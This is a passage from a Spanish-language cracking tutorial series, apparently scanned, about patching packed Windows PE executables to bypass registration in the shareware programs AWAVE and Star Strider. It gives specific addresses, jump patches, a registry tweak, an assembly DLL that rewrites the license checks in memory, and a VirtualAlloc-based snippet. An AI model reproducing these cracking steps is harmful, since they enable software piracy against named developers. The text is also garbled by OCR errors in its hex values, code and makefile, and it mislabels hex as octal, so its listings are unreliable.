overwritten-instruction en la parate inferior del cuadro de 
diálogo "Project Option". Snippet Creator colocará el código 
necesario para restaurar las instrucciones originales dentro del 
recorte. 


Luego, hay que considerar qué hacer después de que la última 
instrucción del recorte haya sido ejecutada. Se puede elegir 
devolver el control al archivo objeto (target) en una dirección 
virtual específica. Si no, se debería poner alguna instrucción 
que sería la última del recorte, tal como ExitProcess. 


En nuestro caso particular, ya hemos calculado la dirección virtual del nuevo 
punto de entrada, que corresponde al desplazamiento donde colocaremos el 
recorte: 00406220h. Como queremos que nuestro recorte tome el control al 
iniciar el programa, elegimos la opción "Redirect Entry Point RVA"”. Esto 
dará el control al recorte desde el comienzo. Además queremos que el 
programa siga su curso después de la ejecución del recorte, entonces 
elegimos la opción "Return To Program" y en la casilla "Virtual Address" 
colocamos la dirección del punto de entrada original: 00401000. 


6.4. Una vez establecidas las opciones del proyecto, se inserta el recorte en 
el archivo objeto usando "Action/Patch Target File". Snippet Creator no 
preservará registros/banderas (flags), es tu responsabilidad. Si algo no 
funciona como se esperaba, se puede examinar el código fuente del recorte 
en el directorio del proyecto y ver cómo va todo. 


Listo. 
Ahora activemos el target (NOTEPAD). ¿Qué te parece? 


Icz termina su tutorial recordando que SC puede ser empleado también como un simple 
editor de archivos PE, lo mismo que ProcDump. 


El recorte es grande y no quiero aumentar el programa 


En ocasiones el tamaño del archivo empacado es un parámetro crítico a través del cual un 
sistema de protección puede evaluar si ha habido intento de abuso. En estos casos es 
posible implementar una DLL. Así sólo tengo que insertar la llamada a la DLL en el 
archivo objeto y listo. Si no sabes qué es una DLL, como se programa, y para qué sirve, 
revisa el final de este documento. 


MALDITAS PROTECCIONES: quebrando AWAVE v5.4 


Parchando archivos empaquetados con SnippetCreator 


Voy a intentar desproteger un programita llamado AWAVE v3.4. Es un programa ejemplar 
para mostrar como romper protecciones de archivos ejecutables empaquetados a través de 
la inserción de código nuevo en ellos empleando Snippet Creator. Quiero subrayar que no 
tengo nada contra el programador que creó este buen programa. Por el trabajo que me dio, 
tengo la impresión de que sabía lo que hacía. Yo aconsejaría que quienes deseen usar el 
programa, lo registren. Si yo pudiera lo haría. Pero mi objetivo no es aprovechar el 
programa sino enseñar el estilo de romper protecciones que estoy implementando. 


Para romper las protecciones de archivos empaquetados, la táctica empleada generalmente 
es esperar que el archivo se despliegue en memoria y sobreescribir la rutina de protección 
en tiempo de ejecución. Esto comúnmente se ha hecho con un cargador (loader) que atrapa 
una llamada a alguna API de W32 que realice el programa, y entrega el control a la rutina 
que desprotegerá el programa: el mismo cargador tomará el control y cambiará en 
memoria el esquema de protección. 


El uso de loaders me parece que presenta una dificultad: en este método entran en juego 


dos procesos distintos, el del loader y el del programa mismo. Esto dificulta las cosas y nos 
obliga a escribir un número significativo de líneas de código. Las funciones de W32 para 
escribir procesos remotos, son complejas. El loader puede tener fácilmente un tamaño de 
100 KB, especialmente si no lo escribimos en lenguaje ensamblador. 


Si hacemos que la rutina que rompe las protecciones del programa se ejecuten en su propio 
proceso, me liberaré de la carga que implica enganchar instrucciones en procesos remotos, 
sobrescribir y leer procesos remotos, etc. Esto lo podemos lograr simplemente insertando 
la rutina desprotectora en el mismo ejecutable del programa. Veamos el caso particular de 
AWAVE v4.5. 


El programa presenta dos limitaciones engorrosas. La primera es un NAG que aparece al 
comienzo y que recuerda que se trata de un programa no registrado y retarda el inicio del 
programa. La otra protección importante es que el programa no permite guardar más de un 
archivo por sección. Hay un par de cuestiones secundarias: son dos cadenas, una dice 
"Unregistered copy" y aparece en la parte izquierda del área cliente; la otra dice "(Unreg)" 
y aparece en la "Caption" de la ventana. Aunque no es tarea fácil, eliminaremos estas 
molestias. 


Si intentamos cargar el programa con SICE, no se disparará la ventana del depurador 
porque el programa está empaquetado y se han cambiado los atributos de las secciones. 
Entonces creamos en SnippetCreator un nuevo proyecto (File/New Project) y llamémosle 
awave, cuyo target sería awave.exe. Revisamos los atributos de las secciones y cambiamos 
los de las secciones .text y .adata, que son, respectivamente las secciones de código 
ejecutable y la rutina de descompresión. El punto de entrada está en esta última sección. 
Los atributos deben ser E0000020. 


Cambiados los atributos, encontramos que ahora sí se dispara la ventana de SICE cuando 
cargamos awave.exe con e lloader de Softlce. Tenemos que buscar varias direcciones: 


1. La dirección donde finaliza la rutina de descompresión (VA1: Virtual 
Addres 1). Cuando el programa llega a este punto, ya el archivo está 
totalmente descomprimido en la memoria. 


2. Las direcciones de los puntos que deseamos cambiar o parchar. 


3. El desplazamiento en el archivo donde escribiremos el recorte nuevo. Esto 
no se hace con Softlce sino con un editor hexadecimal. 


Como el archivo está empaquetado, existen diferencias sustanciales entre la lista muerta 
que es el archivo mismo y el código vivo ya desempacado que vemos con Softlce. Por este 
motivo no sirve establecer el desplazamiento en el archivo correspondiente a las 


direcciones de memoria donde deben hacerse cambios. Así que la estrategia es agregar una 
rutina al programa que sobreescriba en tiempo de ejecución las rutinas que queremos 
cambiar. 


Otro cambio que debemos introducir al archivo es el concerniente a la instrucción que 
entregará el control a nuestro nuevo recorte. 


Determinemos el desplazamiento del recorte. Con el editor hexadecimal podemos ubicar 
un espacio vacío en el desplazamiento 0004 3140h. A partir de él y los calculamos la 
dirección virtual de su ubicación utilizando la fórmula: 


Dir Virtual = (Desplazamiento del dato - RawData) + (ImageBase + RVA 
Offset) 


Los datos que necesitamos para este cálculo los hallamos con el mismo 
Snippet Creator. En Snippet Creator activamos el comando "ActionNew 
Target". Pulsamos BROWSE y ubicamos AWAVE.EXE y pulsamos SAVE. 
Ahora activamos "PE Info/View PE header". Encontramos que: 


ImageBase = 0040000h 


Luego activamos "PE Info/View Section Info". Para la sección .text 
encontramos: 


RawData = 1000h 
RVA Offset = 1000h 
RawSize = 042200h 


Comprobamos que es en esta sección donde se encuentra el desplazamiento 
para nuestro injerto. Ahora calculemos la dirección virtual: 


(43140h - 1000h) + (400000h + 1000h) = 00443140h 


Debemos entregar el control a esta rutina cuando el archivo ya esté desempacado. Con 
Softlce hemos ubicado esta rutina: 


0050B54B  0385AC504400 add eax,[ebp+004450AC] ; <- VAO 


0050B551  5B pop eax 
0050B532  ..... 
0050B558 61 popad 


0050B559 7508 jnz 


0050B55B  B3801000000 mov eax, 1 


0050B560  02C000 ret OCh 
0050B563 50 push eax 
0050B564 (3 ret 


Debemos insertar en alguna parte de este código la siguiente instrucción, que entregará el 
control al recorte: 


68 00 443140 push 00443140h 
C3 ret 


Como vemos, la instrucción consta de seis bytes. Analizando el código de más arriba, 
vemos que la instrucción en 50B54B tiene ese tamaño, así que tomamos esa. Calculamos 
el desplazamiento en el archivo correspondiente a esta dir. virtual y es 05454Bh. Si 
revisamos con el editor hexadecimal este desplazamiento veremos que no se corresponden 
los valores con los que vemos en SICE. Lo que ocurre, me imagino, es que se trata de un 
desempacador compuesto de dos partes. El desempacador mismo está empacado. Hay pues 
dos desempacadores, uno desempaca el desempacador del programa. Así que necesitamos 
una dirección más: la dirección final del primer desempacador o ubicar una punto en el 
primer desempacador donde la instrucción que nos toca ya esté desempacada. Ubicada esta 
dirección, pasamos desde aquí el control al recorte; hacemos que el recorte escriba la 
instrucción 0050B54B para que vuelva a pasar el control al recorte, que romperá ahora las 
protecciones sobre el archivo desplegado. 


Para hallarla, cargamos el ejecutable en Softlce y hacemos: 
D 50B54B 


Esto desplegará en la ventana de datos de Softlce el contenido en hexadecimal que hay en 
0050B54B. Luego ejecutamos F10 hasta ver en la ventana de datos de Softlce algo como 
esto: 0385AC504400. 


Yo he determinado esta dirección: 
0050B0OB7  8B85B5504400 mov eax, [ebp + 004450B5] ; <- VAO 
Como ven, la instrucción tiene seis bytes. 


El desplazamiento de esta dirección en el archivo es 0540B7h. Con el heditor hexadecimal 
escribimos en esta instrucción: 


68 40 31 44 00 C3 


que es el equivalente octal de las instrucciones "push 443140h" - "ret". Cuando se ejecute 
el programa y llegue a este punto, pasará el control a las rutinas escritas en el 
desplazamiento 043140h del archivo, correspondiente a la dirección virtual 00443140h del 
programa. 


La rutina del recorte deberá incluir una rutina que restaure la instrucción que hemos 
modificado (en 0050B0B7) y que modifique el final del segundo desempacador, cuando el 
programa ya está totalmente desempacado, para que se entregue el control de nuevo a una 
rutina que introducirá por fin los cambios definitivos en el programa. 


Tenemos ya las siguientes direcciones: 


1. Dirección de la instrucción que entregará por primera vez el control al 
recorte. Final del primer desempacador: SOBOB7h. La llamamos VAO. 

2. Dirección del recorte en el archivo: 00443140h. VA2. 

3. Dirección de la instrucción que devolverá por segunda vez el control al 
recorte 50B54Bh. La llamamos VA1. 


Ahora, queda romper las protecciones para obtener las últimas direcciones: las que hay que 
cambiar para desproteger el programa. Necesito estas direcciones para escribir el código 
del recorte. Por razones de tiempo no entraré en detalles y las daré de inmediato: 


Para registrar el programa debes enviar un email a su autor y cancelarle no 
sé cuántos dólares. Luego recibirás a través de cualquier mecanismo un 
archivo .TXT o .KEY que debes abrir con el programa: "OptionsProgram 
SetuplRegister". Este proceso es engorroso, así que puedes hacer lo siguiente 
para disfrutar el programa en toda su plenitud: 


1. En el registro de Win, en la clave HKCUSoftwarelFMJ-SoftwarelAwave: 
Crear nuevo valor de cadena: Username "mi nombre" 


2. Aplicar los parches 


En 0047EFCC: 7540 jnz 0047F00E 
Poner 0047EFCC: EBOD ¡mp 0047EFDB 


En 0047EFEC: 7405  jz 0047E7F3 
Poner 0047EFEC: EB09 ¡mp 0047EFF3 


Como ya lo he mencionado, esto no se puede hacer directamente. Tenemos que injertar un 
recorte en el PE que lo haga. Pero tenemos que anotar estas direcciones: 0047EFCCH y 
0047EFECH, así como las instrucciones nuevas: "EBODh" y"EB09h". 


Problemas 


Puedo escribir el código del recorte de manera que realice los parches deseados, injertarlo 
donde he elegido y supuestamente todo andaría bien. Pero hay un problema: cuando el 
programa es desempacado en la memoria ocupa y reescribe el espacio donde ubicamos el 
recorte destruyéndolo : (. Así que estamos obligados a otra estrategia: escribir el recorte 
para que cargue en memoria una librería DLL que escribiremos y que realizará los parches 
en el momento preciso. Como la librería DLL va a ocupar un espacio de memoria 
reservado para ella, el archivo, al ser desempacado no podrá dañar su código : ) 


La estrategia es escribir el recorte para que sólo haga los siguiente: 


1. restaurar la instrucción original en la dirección donde el programa entrega el control al 
recorte 

2. cargar nuestra DLL en el espacio de direcciones del proceso. 

3. cambiar la dirección del final del desempacador para que pase el control a la DLL. 


Procedamos 


1. Abrimos el target con el editor hexadecimal y colocamos la siguiente cadena de valores 
hexadecimales en el desplazamiento 50B54Bh correspondiente a la dirección VAO 


2. Escribimos el siguiente código en la ventana de edición de SC: 
3. Antes de ensamblarlo nos aseguramos de especificar los siguiente: 
4. Ensamblamos el recorte. Si no hubo error lo exportamos: 


5. Cerramos SC y abrimos el target con HexWorkShop. Nos movemos al desplazamiento 
0043140h donde colocaremos el recorte. 


6. Abrimos con HexWorkshop el archivo .BIN que exportamos, lo marcamos todo con el 
ratón y lo copiamos (CTRL+C). 


7. Pasamos a la ventana de Hexworkshop con la vista de EXE. Marcamos con el ratón 


desde 0043140h hasta 00431B0h; el área que hemos marcado corresponde exactamente al 
tamaño del recorte, y hay que ser muy preciso en esta operación ya que es la más delicada 
del proceso. Pegamos el recorte (CTRL+V). 


8. Guardamos y salvamos un respaldo por seguridad. 


9. Ahora escribimos la DLL. En editor de texto aparte escribamos el siguiente código y 
salvémosle como AW_PATCH.ASM. 


TITLE AW_PATCH.DLL: Registra el programa awave v5.4 


.386 
.model flat, STDCALL 


public patch 
public Start 


.data 
OldInstruction db 003h,085h,0ACh,050h,044h,000h 


.code 

Start: 

dll proc instance: DWORD, reason: DWORD, reserved:DWORD 
mov eax, 1 

ret 

dll endp 


patch: 

; Parchar el target para simular registro 
pushad 

mov edi,0047EFCCh 

mov word ptr [edi], 0ODEBh 

mov edi,0047EFECHh 

mov word ptr [edi],009EBh 


; Restaurar código en 0050B54Bh 
mov edi,0050B54Bh 

lea es1,Old Instruction 

mov ecx,6 


rep movsb 

; Tegresar 

popad 

push 0050B54Bh 
ret 


End Start 


LIBRARY aw_patch 

EXPORTS MyAboutDialog 

EXPORTS patch 

DESCRIPTION 'ASM program' 

EXETYPE WINDOWS 

CODE PRELOAD MOVEABLE 

DATA PRELOAD MOVEABLE MULTIPLE 


NAME = aw_patch 
OBJS = S(NAME).obj 
DEF = S(NAMB).def 
RCS = S(NAMB).rc 
RES = S(NAMB).res 


IMPORT=CATAMibuimport32 


TASMDEBUG-=/zi 
LINKDEBUG=/v 


S(NAMEB).DLL: S(OBJS) $(RES) $(DEF) 
tlink32 /Tpd /aa /c SCOBJS),S(NAMB),, SUMPORT), S(DEP), S(NAME) 


.asm.obj: 
tasm32 /ml /m2 $4.asm 


.IC.res 
: brc32 -r SINAMB).rc 


Con esto sólo tenemos que ejecutar desde la línea de comando la orden MAKE, mientras 
apunta al directorio donde está los archivos fuentes ( C:templaw_patch, por ejemplo). 


Una vez creada nuestra DLL, la colocamos en el mismo directorio del recorte. Ensamblado 
el recorte y pegado en la dirección indicada de la víctima. 


Finalmente awave.exe: ¡Ja, ja! 


ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 


¿Las jmp de las apis están siempre en secciones .text? 


Creo que no necesariamente. Por el trabajo con SC y por un post en el foro Spanish 
Reverse Engineering me he enterado que los nombres importados no tienen que estar en la 
sección .idata. Los programas W32 trabajan con un modelo de memoria FLAT; es como 
un archivo DOS .COM, pero sin el límite estrecho de 65 KB: el límite son 4 GB. Todo está 
un gran segmento de 4 GB. Datos y Código puede ir en cualquier parte. El único límite, 
hasta dónde he visto, son precisamente los atributos de las secciones donde se ubican los 
datos brutos. Por eso, yo creo, aunque no lo he probado, que uno puede poner en una 
sección de datos inicializados lo siguiente: 


THUNK]1: jmp [api_address] 
Y llamar a la API desde una instrucción así: 


call THUNKI1 


En teoría debería trabajar. No lo he probado todavía. 


¿Cuál es el significado de las características de las secciones? Todavía no entiendo 
porque modificándolas, también se modifica la carga del ejecutable (y se despliega el 
Sice en la primera instrucción). 


He adelantado alguito antes. Las PCs están basadas en una arquitectura llamada von 
Newmann. Si quieres saber quien es este tipo teo envío la info. Se le considera 
erróneamente el padre de la computadora moderna. La verdad es que fue un matemático 
bestial, muy activo durante la 2da. Guerra. Fue uno de los impulsores del proyecto ENIAC, 
si no me equivoco. Necesitaban computadoras para cálculos avanzados y, especialmente 
para crackear claves y mensajes. De ahí surgió también la cibernética de Norbert Wiener. 
Más importante en esta arquitectura, para mí, es A. Turing, el de la máquina universal. 


Lo cierto es que el descubrimiento de estos tipos fue el tratamiento del código de un 
programa como si fueran sus datos. Gracias a esto, se pueden almacenar las secuencias de 
instrucciones como si fueran datos. W32 le saca la punta a esto y aprovecha el modelo de 
memoria FLAT de los procesadores INTEL x86. Ya te he explicado qué es este modelo. 
Hay más info en las referencias de los procesadores de este tipo. Ahora bien, como 
cualquier cosa puede ser dato, incluso el código, a cada sección del PE se le dan algunos 
atributos durante el enlazado para discriminar un poco entre lo que es dato y lo que es 
código, donde puede escribirse y donde no, etc. Cuando un archivo es comprimido, a las 
secciones se le dan atributos de datos, por lo que el depurador, que sólo lee código, no las 
leerá. Es más, si le das a las secciones de datos atributos de código, te las desplegará hasta 
el W32DASM. 


La siguiente tabla ilustra el significado de las características: 


- 0O0000020h _ Código. 

- 0O00000040h __ Datos inicializados. 

- 0OO000080h __ Datos no inicializados. 

- 040000000h _ Sección cacheable. 

- U80000000h __ Sección paginable. 

- 100000000h __ Sección compartida. 

- 200000000h _ Ejecutable. 

- 400000000h __Se puede leer. 

- 800000000h __Se puede escribir en la sección. 


Por ejemplo, si las características es ED000020H, entonces se trata de una sección en la 


que 


1. se pueden escribir datos 80000000h 


2. se pueden leer datos 40000000h 
3. ejecutable 20000000h 
4. hay código 00000020h 

E0000020h 


¿Qué es una DLL y para qué sirve? ¿cómo se crea? 


DLL es la extensión de archivos empleados por Window$ para enlace dinámico. DLL es la 
abreviatura de Dinamic Link Library, que significa librería de enlace dinámico. 


Un archivo DLL está compuesto por un conjunto de funciones y rutinas que pueden ser 
empleadas y llamadas desde un archivo ejecutable .EXE o desde cualquier otra .DLL. El 
uso de estas funciones se llama enlace dinámico porque se trata de un "enlace" semejante 
al realizado cuando enlazamos archivos .OBJ y .RES con el enlazador (linker) para crear 
ejecutables .EXE, pero que ocurre en tiempo de ejecución y sin el uso de enlazador. 


Esto fue implementado por Window$ considerando que muchas rutinas empleadas por 
varios programas eran las mismas. Para evitar perdida de espacio de memoria, Window$ 
reúne esas rutinas comunes en archivos DLL que pueden ser accedidas, una vez cargadas 
en el área de memoria compartida de un proceso, por más de un programa o proceso. 


Pero las DLL no sólo ahorran espacio de memoria útil. También ofrecen otras ventajas. 
Cómo se encuentran en un área de memoria compartida del proceso, son una vía de acceso 
a proyectos remotos. Es algo complejo, pero se puede hacer. Además de esto, las DLL 
permiten agregar código a un programa sin tener que cambiar el ejecutable para nada: se 
podría hacer actualizaciones importantes de programas sólo cambiando una DLL. 


¿Cómo escribir una DLL? 


Toda DLL tiene un punto de entrada el cual será llamado por Win cada vez que 


- la DLL sea cargada 
- la DLL sea descargada 


- un hilo sea creado en el mismo proceso 
Este es un ejemplo del código del punto de entrada de una DLL: 


DIIEntry proc hInstDLL:HINSTANCE, reason:DWOROD, reserved1: DWORD 
mov eax,TRUE 
ret DIlEntry Endp 


El punto de entrada puede tener cualquier nombre y apunta a una función con tres 
parámetros: 


- hInstD!l = manejador de instancia del módulo DLL. 


- reason = bandera con uno los siguientes valores: 

DLL_PROCESS_ATTACH: La DLL recibe este valor cuando injertado por vez primera 
en el espacio de direcciones del proceso. Se puede usar esta posibilidad para hacer 
inicialización. DLL _PROCESS_DETACH: La DLL recibe este valor cuando está siendo 
descargada del espacio de direcciones del proceso. Se puede usar esta posibilidad para 
hacer una limpieza como deslocalización de memoria. 

DLL_THREAD_ATTACH: La DLL recibe este valor cuando el proceso crea un nuevo 
hilo. DLL_THREAD_DETACH : La DLL recibe este valor cuando un hilo del proceso es 
destruido 


Para que la DLL sea cargada dentro de un proceso, debe retornar TRUE en eax. En caso 
contrario, no será cargada. 


Las funciones de la DLL pueden ser colocadas antes o después de la entrada. Pero para que 
puedan ser llamadas desde otros programas, deben colocarse las siguientes líneas en el 
archivo DEF de definición: 


LIBRARY DLL_Name 
EXPORTS Function_Name 


La directiva LIBRARY define el nombre del módulo DLL. Debe señalarse con el nombre 
de archivo de la DLL. La directiva EXPORTS dice al enlazador (linker) cuales funciones 
de la DLL son exportadas, es decir, pueden ser llamadas desde otros programas. 


¿Cómo compilar y enlazar un archivo DLL? 


También hay que indicar en los conmutadores del enlazador la opción /DLL y 
/DEF:DEF_name: 


link /DLL /SUBSYSTEM:WINDOWS /DEF:DEF_name /LIBPATH:c:i1masm32Vib OBJ_name.obj 
Los conmutadores del ensamblador son los mismos: 

le Icoff /Cp 

En el caso de Borland Turbo Assembler, en vez de /DLL, se coloca /Tpd: 

tlink32 /Tpd /aa /c /v SCOBJS),F(NAMB),, SMPORT), S(DEP), (NAME) 


Después de enlazar el archivo objeto, se obtendrá la DLL y un archivo .lib. Este archivo 
«lib es la librería de importación que puede ser usada para enlazar programas que usan las 
funciones que está en la DLL. 


Para que un ejecutable EXE u otra DLL llame a funciones dentro de una DLL, debe 
proyectar primero la DLL en el espacio de direcciones del proceso que llama. 


¿Como cargar la DLL en el espacio de nombres del proceso? 
Hay dos maneras: 


1. Enlazado implícito: es el más común. Como hemos visto al crear aplicaciones W32, al 
enlazar un ejecutable debemos indicar un conjunto de archivos LIB al enlazador. Estos 
archivos LIB contienen una lista de las funciones de la DLL que pueden ser importadas 
desde otros archivos EXE o DLL. Cuando hacemos el enlace, el enlazador toma 
información de los archivos LIB correspondientes y la incrusta en el archivo EXE creado. 
Luego, cuando el sistema cargue el EXE, el cargador examinará el encabezado de este 
archivo y establecerá las DLLs que deberán ser cargadas en el espacio de direcciones del 
proceso para que se ejecute la aplicación. El sistema buscará las DLLs requeridas en los 
directorios de sistema e intentará cargarlas. 


2. Enlazado explícito: llamando a LoadLibrary con el nombre de la DLL deseada. Si la 
función tiene éxito, devuelve un manejador a la librería (DLL). Si no, retornará NULL: 


invoke LoadLibrary,addr LibName 


El manejador devuelto se puede pasar a GetProcAddress o a cualquier otra librería que 
requiera este manejador como parámetro: 


mov hLib,eax 
invoke GetProcAddress,hLib,addr FunctionName 


Esta llamada devuelve la dirección de la función cuyo nombre ha sido pasado como 
segundo parámetro. De otra manera, retorna NULL. El valor devuelto ahora puede ser 
usado para llamar a la función deseada: 


mov TestHelloAddr,eax 
call [TestHelloAddr] 


Usada la librería DLL, se descarga con FreeLibrary: 


invoke FreeLibrary,hLib 2. 


Gracias a: 
GERZA, ManiacPC y KuT. 


Comentarios y correcciones: nuMIT_orOiname.com 
Mi página de programación: nuMIT_ors Programming Page 


CRACKEAR ARCHIVOS PE 
EMPAQUETADOS ( III) 


Usando memoria virtual 


pornuMl!lT_ or [kUT] 


Target: Star Strider v1.5 (http://www.fmjsoft.com) 


Tools: SnippetCreator v1.5 
Soft Ice 
HexWorkShop 
TASM v5.0 
Note: Puedes encontrar estas herramientas en: http://members.xoom.com/crk10/archivos 


Author: nuMIT_or 


Intro 


Bien amigos, seguro que alguna vez han encontrado programas fácil de desproteger pero 
que presentan el problema de estar empacados y no es tan fácil parcharlos. Algunos 
crackers han superado este obstáculo empleando parcheadores de procesos (process 
partchers). Recientemente, y podemos constatarlo en los fabulosos tutoriale de R!SC, otros 
crackers detectan con un depurador -debugger- como Soft Ice los puntos donde colocar en 
archivo ejecutable los parches y en un breve análisis del ejecutable mismo ubica dónde 
insertar un recorte -snippet- que parche el programa cuando se despliega en memoria para 
su ejecución. A veces esto es relativamente sencillo, pero otras veces no tanto. Yo he 
implementado el uso de DLLs cuando el recorte es muy grande [ver CRACKEAR 
ARCHIVOS PE EMPAQUETADOS (II )] y el tamaño es un parámetro crítico. Ahora 
implementaré otro método para esto que me ha parecido más sencillo y mejor porque no 
requiere archivos adicionales: aprovechar las APIs del manejo de memoria virtual de 
Windows. 


¿Cuándo usar este método? 


Cuando el espacio donde se ubica el recorte es limpiado y barrido por el programa en el 
momente que el archivo ejecutable es desempacado y no queremos usar una DLL para 
evitar esto. 


Esta técnica consiste en escribir el recorte de código y moverlo a un lugar seguro en la 
misma memoria del proceso, pero lejos del área de despliegue del ejecutable. De esta 
manera cuando se despliegue el programa no podrá alcanzar el recorte y destruirlo. 
Entonces el programa pasará el control al recorte en memoria para que el recorte de código 
parche el programa y lo desprotega (si éste es nuestro objetivo). 


AtAktEee... je-¡Ée 


Si cargamos el archivo StarStrider.exe con Softlce e intetamos desplegar su contenido, no 
se disparará la ventana del depurador porque el programa está empaquetado y se han 
cambiado los atributos de las secciones. 


A esta altura ya deberíamos tener una idea de cómo desplegar el programa de un archivo 
empacado en Soft Ice. Abrimos el archivo con un editor de archivos PE (ProcDump o 
SnippetCreator) y cambiamos las características de la sección de código. Con 
SnippetCreator procedemos así: 


Creamos en SnippetCreator un nuevo proyecto (File/New Project) y llamémosle SS, cuyo 
target sería StarStrider.exe. Recabamos información sobre el encabezado del archivo (PE 
InfoWView PE Header): 


Address Entry Point: 00 06 E0 00 h 

Ahora cambiamos las características de la sección de código (por lo general .text o .code). 
Ejecutamos PE InfoView Section Info. Vemos que el punto de entrada coincide con la 
dirección de inicio de la sección .aspack. Anotemos de una vez los siguientes valores de 


.aspack: 


V. Offset:  0006E000h 
Raw Offset: 00025400h 


Así que hacemos click con el botón derecho del ratón sobre .text (la sección de código) y 


elegimos Edit Section en el menú emergente; pulsamos el botón "..." de "Characteristics", 
elegimos IMAGE_SCN_CNT_CODE y IMAGE_SCN_CNT_EXECUTE y pulsamos el 
botón "Save". Ahora en en el campo "Characteristics" aparece E0 00 00 60h. 


Después de realizar esta operación con StartStrider.exe, carguémoslo con el "loader" de 
Softlce y empleando F10, F9 y FS estratégicamente busquemos el final del la rutina que 
desempaca el archivo: 


0157:0046E5B1 50 PUSH EAX 

0157:0046E5B2 038548304400 ADD EAX,[EBP+004430A8] 
0157:0046E5B8  5B POP EBX 

0157:0046E5B9  OBDB OR EBX,EBX 
0157:0046E5BB  8985E12E4400 MOV [EBP+00442EE]1],EAX 
0157:0046E5C1 61 POPAD 

0157:0046E5C2 7508 JNZ 0046E5CC 
0157:0046E53CC.  68305E4200 PUSH 00425E30 
0157:0046E5D1  C3 RET 


Vamos a necesitar un espacio de seis bytes para la nueva instrucción, así que escogemos: 
0157:0046E5BB  8985E12E4400 MOV [EBP+00442FFE1],EAX 


Como antes, llamamos a esta dirección RVA1: es la dirección que entrega el control a 
nuestro recorte parchador. 


Como en otros casos que he analizado, esta instrucción también está empaquetada, así que 
para parcharla y reescribir en ella las instrucciones que entregan el control al recorte 
tenemos que esperar hasta que la instrucción misma sea desempacada porque si no, cuando 
la instrucción se despkliegue corroerá nuestro parche. Esto nos obliga a encontrar un punto 
anterior para dar el controla nuestro de código. Para esto ejecutamos en Softlce el 
comando: D RVA1 = D 0046E5BB. En la ventana de datos podemos ir revisando hasta 
que en ella aparezca el código octal correspondiente a las instrucciones que queremos 
localizar. 


Cargamos StarStrider.exe con el "loader" de Softlce, ejecutamos el comando D 0046E5BB 
y vamos trazando el programa con la tecla F10 hasta ver en la ventana de datos: 


0030:0046E5BB  2EE18589 75610044 00 


Es la representación en octal en reverso y ordenada en valores dword de: 


8985E12E4400 MOV [EBP+00442EE1],EAX 


La instrucción que buscamos se despliega cuando se ejecuta la instrucción 
0157:0046E0E7: 


0157:0046E0E7  F3A4 REPZ MOVSB ; <- 

0157:0046E0E9  8B8541294400 MOV EAX,[EBP+00442941] ; <- VAO 
0157:0046E0EF 6800800000 PUSH 00008000 

0157:0046E0F4  6A00 PUSH 00 

0157:0046E0F6 50 PUSH EAX 

0157:0046E0F7  FF9549294400 CALL [EBP+00442949] 
0157:0046E0FD  8D851D2C4400 LEA EAX,[EBP+00442C1D] 
0157:0046E103 50 PUSH EAX 

0157:0046E104  C3 RET 


Así que podemos elegir la instrucción 0046E0E9, una instrucción de seis bytes y que se 
realiza cuando la instrucción VA1 ya está desplegada. Llamamos a esta instrucción VAO. 


Ahora tenemos que localizar un espacio para nuestro recorte de código. Podemos hacer 
esto con el editor hexadecimal y sin mucho tecnisismo. Abrimos StarStrider.exe con 
HexWorkshop y buscamos "manualmente" un espacio con gran cantidad de ceros. Hay 
varios, pero elegimos el espacio que comienza en el desplazamiento del archivo 00 01 DC 
00 h. ¿Por qué? por intuición: a la vista parece suficiente. 


Para realizar nuestro trabajo tenemos que convertir el desplazamiento en el archivo a 
dirección virtual. Para eso aplicamos la siguiente fórmula: 


VA del recorte = (Desplazamiento del recorte - RawOffset de la Sección) + (ImageBase + 
VirtualOffset de la sección) 


Tenemos que ubicar en qué sección está el espacio para el recorte y especificar dónde 
comienza esa sección. 


Vemos que el recorte está entre, es decir, en la sección .rsrc, que inicia en la dirección 
virtual (VA) 00 04 00 00 h y cuyo desplazamiento en el archivo es 01 DCO0h. 


Aplicando la fórmula tenemos: 
(00025260h - 0001DC00h) + (00400000h + 00040000h) = 00447660h 


Sólo nos queda ubicar las instrucciones que necesitamos cambiar para que el programa 


tenga el comportamiento de un programa registrado. 


Como supongo que el lector de este escrito ya debe tener cieta destreza ubicando los 
puntos frágiles de un programa, no explicaré como encontrarlo. Además ese no es el objeto 
de este escrito sino el aprender una estrategia para parchar archivos empaquetados. Así que 
de una vez indico que la instrucción a cambiar es: 


0157:0042FBA3 51 PUSH ECX 
0157:0042FBA4 52 PUSH EDX 
0157:0042FBAS  E8D6000000 CALL 0042FC80 
0157:0042FBAA —85C0 TEST EAX,EAX 
0157:0042FBAC 7340 JNZ 0042FBEE 
0157:0042FBEE  BB88080000 MOV EBX,00000888 
0157:0042FBF3  8BC3 MOV EAX,EBX 
0157:0042FBFS  5B POP EBX 
0157:0042FBF6 SE POP ESI 
0157:0042FBF7  81C4D0000000 ADD ESP,000000DO 
0157:0042FBFD  C21400 RET 0014 


Es muy simple lo que tenemos que hacer. Reemplazar la instrucción 


0157:0042FBAA —85C0 TEST EAX,EAX 
por: 
0157:0042FBAA  EB2B JMP 0042FBD7 


Con esta instrucción saltamos todas las pruebas que comprueban si el programa ha sido 
registrado hasta la dirección 0042FBD7, que es la dirección a donde debería llegar el 
programa si estuviera registrado. 


El Recorte 


Ahora lo decisivo: escribir el recorte. Corremos Snippet Creator y abrimos el proyecto SS 
que creamos al principio. 


Establecemos las opciones del proyecto: 


He descubierto que (aunque no sé porqué motivo) algunas acciones hechas por Snippet 
Creator sobre archivo PE empaquetados deterioran el archivo. Así que muchas opciones de 
Snippet Creator que podrían ahorrarnos trabajo no se pueden emplar cuando injertamos 


código nuevo en ejecutables. Así que nos conformaremos con las siguientes opciones 
(ejecutamos Action Project Options para desplegar el diálogo Project Options): 


Snippet VA: 477660 

Patch Options: Patch Into Existing Section 

Address to Redirect Control to the Snippet: No Redirection 
Return Control To Program: Don't Return Control To Program 


Otras opciones que no hemos podico elegir tendremos que realizarlas nosotros mismos 
"manualmente". No es difícil hacerlo. 


Este es el recorte de código: 


extrn LoadLibraryA :near 
extrn GetProcAddress:near 


jmp numitl 


11 db 'kernel32.d11',0 

f1 db 'VirtualAlloc',0 

OldInstruction db 08Bh,085h,041h,029h,044h,000h 
NewInstruction db 068h,000h,000h,000h,000h,0C3h 


numitl: 

; Restaurar antigua instrucción 
pushad mov esi,offset OldInstruction 
mov edi,46E0E9h 

mov ecx,6 

rep movsb 


; Obtiene la dirección de la función VirtualAlloc en la memoria del proceso 
push offset 11 

call [LoadLibraryA] 

push offset f1 

push eax 

call [GetProcAddress] 


; Reservar espacio en memoria para el recorte 
mov esi, (final - init) 


push esi 
call eax,0,esi,1000h,40h 


